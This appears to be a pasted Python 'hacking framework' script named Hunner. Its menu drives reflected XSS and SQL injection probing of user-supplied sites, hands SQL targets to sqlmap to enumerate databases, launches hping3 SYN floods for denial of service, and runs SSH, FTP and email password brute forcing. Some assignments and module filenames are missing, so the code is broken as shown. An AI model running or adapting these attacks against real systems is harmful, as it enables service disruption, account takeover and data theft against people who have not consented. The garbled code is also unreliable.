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Sep 15th, 2017
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  1. # Create python3
  2. # Author
  3. import urllib.request as urllib2
  4. import re
  5. import sys,os
  6. import random
  8. H = '\033[95m'
  9. B = '\033[94m'
  10. G = '\033[92m'
  11. W = '\033[93m'
  12. F = '\033[91m'
  13. E = '\033[0m'
  14. U = '\033[4m'
  15. O = '\033[33m'
  17. def info():
  18. VERSION = B+'1.0'+E
  19. AUTHOR = B+'B3-v3r'+E
  20. print("""
  21. #################################
  22. # #
  23. # Version-> %s #
  24. # #
  25. # Author-> %s #
  26. # #
  27. #################################
  28. """ % (VERSION, AUTHOR))
  29. def heads():
  30. global head
  31. head = E+H+"""
  32. ``
  33. """+E
  34. def banner():
  35. text1 = B+"""
  36. ___
  37. ( )
  38. | | .-. ___ ___ ___ .-. ___ .-. .--. ___ .-.
  39. | |/ \ ( )( ) ( ) \ ( ) \ / \ ( ) \
  40. | .-. . | | | | | .-. . | .-. . | .-. ; | ' .-. ;
  41. | | | | | | | | | | | | | | | | | | | | | / (___)
  42. | | | | | | | | | | | | | | | | | ' _.' | |
  43. | | | | | | ; ' | | | | | | | | | .'.-. | |
  44. | | | | ' `-' / | | | | | | | | ' `-' / | |
  45. (___)(___) '.__.' (___)(___) (___)(___) `.__.' (___)
  46. """+F+'<<<<--------'+W+'The hacking framework'+F+'-------->>>>'+E
  47. text2 = O+"""
  48. _ _
  49. | | | |
  50. | |_| |_ _ _ __ _ __ ___ _ __
  51. | _ | | | | '_ \| '_ \ / _ \ '__|
  52. | | | | |_| | | | | | | | __/ |
  53. \_| |_/\__,_|_| |_|_| |_|\___|_|
  54. """+F+'<<<<---------'+W+'B3-v3r'+F+'--------->>>>'+E+F+'\n<<<<--------'+W+'The hacking framework'+F+'-------->>>>'+E
  55. text3 = F+"""
  56. ____ ____
  57. |_ || _|
  58. | |__| | __ _ _ .--. _ .--. .---. _ .--.
  59. | __ | [ | | | [ `.-. | [ `.-. |/ /__\\[ `/'`\]
  60. _| | | |_ | \_/ |, | | | | | | | || \__., | |
  61. |____||____|'.__.'_/[___||__][___||__]'.__.'[___]
  63. """+B+'Version ='+W+' 1.0'+E
  64. ran = random.randrange(1, 4)
  65. if ran == 1:
  66. print(text1)
  67. elif ran == 2:
  68. print(text2)
  69. elif ran == 3:
  70. print(text3)
  72. def XXS():
  73. os.system('clear')
  74. banner()
  75. print('Enter site:')
  76. try:
  77. site = input(B+'Hunner»XXS»'+E)
  78. except:
  79. print(F+'\nError'+E)
  81. if "http://" not in site and "https://"not in site:
  82. site = 'http://' + site
  83. else:
  84. pass
  86. if "id=" not in site:
  87. print(F+'[!]'+E+' Site dont have id parametrs')
  88. else:
  89. print(W+'[*]'+G+' Site '+site+' have "id" param')
  91. try:
  92. res = urllib2.urlopen(site)
  93. except:
  94. print(F+'[!] Site not work'+E)
  95. exit()
  97. try:
  98. print(W+'[+]'+G+' Site work'+E)
  99. scr = ';<script>alert(111111111111111111111);</script>'
  100. site_xxs = site+scr
  101. res = urllib2.urlopen(site_xxs)
  102. info =
  103. print('################Info################\n')
  104. print(info)
  105. print('####################################\n')
  106. text =
  108. if "111111111111111111111" not in str(text):
  109. print(F+'[!]'+' Site not have XXs '+E)
  110. exit()
  111. else:
  112. print(U+W+'[++]'+B+' Site '+site +' have xxs vulnerability'+E)
  113. print(W+'Payload: '+G+site_xxs+E)
  114. sys.exit(1)
  116. except:
  117. print(F+'[!]'+' Fatal Error'+E)
  118. exit()
  119. def desc():
  120. print(F+'''
  121. This program was created for review and not for causing harm.
  122. Usage of hunner for attacking targets without prior mutual consent is illegal.
  123. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
  124. '''+E)
  126. def SQL():
  127. os.system('clear')
  128. banner()
  129. print(G+'Enter site:'+E)
  130. site = input(B+'Hunner»SqlScaner»'+E)
  131. if "http://" not in site and "https://"not in site:
  132. site = 'http://' + site
  133. else:
  134. pass
  135. if "id=" not in site:
  136. print(F+'[!]'+E+' Site dont have id parametrs')
  137. else:
  138. print(W+'[*]'+G+' Site '+site+' have "id" param')
  139. try:
  140. res = urllib2.urlopen(site)
  141. print(W+'[+]'+G+' Site work'+E)
  142. except:
  143. print(F+'[!]'+E+' Site dont work')
  144. try:
  145. info =
  146. print('#####################Info#####################')
  147. print(info)
  148. print('##############################################')
  149. bad_site = site+'\'\"'
  150. res = urllib2.urlopen(bad_site)
  151. text =
  152. if 'You have an error in your SQL syntax' not in str(text):
  153. print(W+'[--]'+F+' Site '+site+' not have Sql Error'+E)
  154. else:
  155. print(W+'[++]'+H+' Site '+F+site+H+' have SQL Error '+E)
  156. print('Start sqlmap ?')
  157. y = input('Y/n->')
  158. if y == "Y" or y == 'y':
  159. os.system('sqlmap -u '+site+' --dbs')
  160. else:
  161. print(W+'<< Good by >> '+E)
  162. except:
  163. print(F+'Fatal error'+E)
  166. def Dos():
  167. os.system('clear')
  168. banner()
  169. print('Enter site:')
  170. site = input(B+'Hunner»Dos»'+E)
  171. print('''Enter level:
  172. 1) High dos
  173. 2) Dos port
  174. 3) Low dos''')
  175. level = int(input(B+'Hunner»Dos»Level»'+E))
  176. if level == 1:
  177. os.system('hping3 -S -P --flood -V '+site)
  178. if level == 2:
  179. port = input(B+'Hunner»Dos»Level»Port»'+E)
  180. os.system('hping3 -S -P --flood -V -p '+port+' '+ site)
  181. if level == 3:
  182. os.system('python3 modules/ '+site)
  184. def SSH_Brut():
  185. os.system('clear')
  186. banner()
  187. try:
  188. print(F+'Brutforse ssh mode!!'+E)
  189. print('Enter target host:')
  190. host = input(W+'Hunner»SSH»Host»'+E)
  191. print(G+'Enter username:'+E)
  192. print(G+'Default: admin'+E)
  193. user = input(W+'Hunner»SSH»User»'+E)
  194. if user == "":
  195. user = 'admin'
  196. print(G+'Enter password file:'+E)
  197. password = input(W+'Hunner»SSH»Password»'+E)
  199. if password == "":
  200. print('Enter password file')
  201. sys.exit(1)
  202. os.system('python3 modules/ '+host+' '+user+' '+password)
  203. except:
  204. print(F+' User aborting !!')
  205. exit()
  208. def FTP_Brut():
  209. os.system('clear')
  210. banner()
  211. print(F+'Brutforse ftp mode!!'+E)
  212. print(B+'Enter host:'+E)
  213. host = input(W+'Hunner»Ftp»Host»'+E)
  214. print(B+'Enter user:'+E)
  215. print(F+'Default: admin')
  216. user = input(W+'Hunner»Ftp»User»'+E)
  217. print(B+'Enter password file:'+E)
  218. password_list = input(W+'Hunner»Ftp»Password»'+E)
  219. if user == '':
  220. user = 'admin'
  221. if password_list == '':
  222. print('Enter password list')
  223. sys.exit(1)
  224. os.system('python3 modules/ '+host+' '+user+' '+password_list)
  227. def mail():
  228. os.system('clear')
  229. banner()
  230. print(H+'Brut mail account'+E)
  231. print(B+'Enter login:'+E)
  232. mail = input(W+'Hunner»Mail»Login»'+E)
  233. print(B+'Enter password list:'+E)
  234. password = input(W+'Hunner»Mail»Password»'+E)
  235. if password == '':
  236. print(F+'Password list: password/password_list.txt'+E)
  237. password = 'password/password_list.txt'
  238. os.system('python3 modules/ '+mail+' '+password)
  240. def Main_Menu():
  241. print(head)
  242. desc()
  243. print('\n')
  244. print(B+'''
  245. Menu sites:
  246. '''+E+'''
  247. 1) XXS
  248. 2) Sql
  249. 3) Dos site
  250. '''+W+'''-------------------'''+E)
  251. print(B + '''
  252. Menu Brute:
  253. '''+E+'''
  254. 4) Brute Ftp
  255. 5) Brute SSH
  256. 6) Brute mails
  257. '''+W+'''-------------------\n'''+E)
  258. try:
  259. v = input('Hunner-»')
  260. except:
  261. print(' Good by ')
  262. exit()
  264. if v == 'help':
  265. info()
  266. elif int(v) == 1:
  267. XXS()
  268. elif int(v) == 2:
  269. SQL()
  270. elif int(v) == 3:
  271. Dos()
  272. elif int(v) == 4:
  273. FTP_Brut()
  274. elif int(v) == 5:
  275. SSH_Brut()
  276. elif int(v) == 6:
  277. mail()
  278. else:
  279. print(F+'[!]'+' You entered an incorrect value '+E)
  280. exit()
  281. heads()
  282. Main_Menu()
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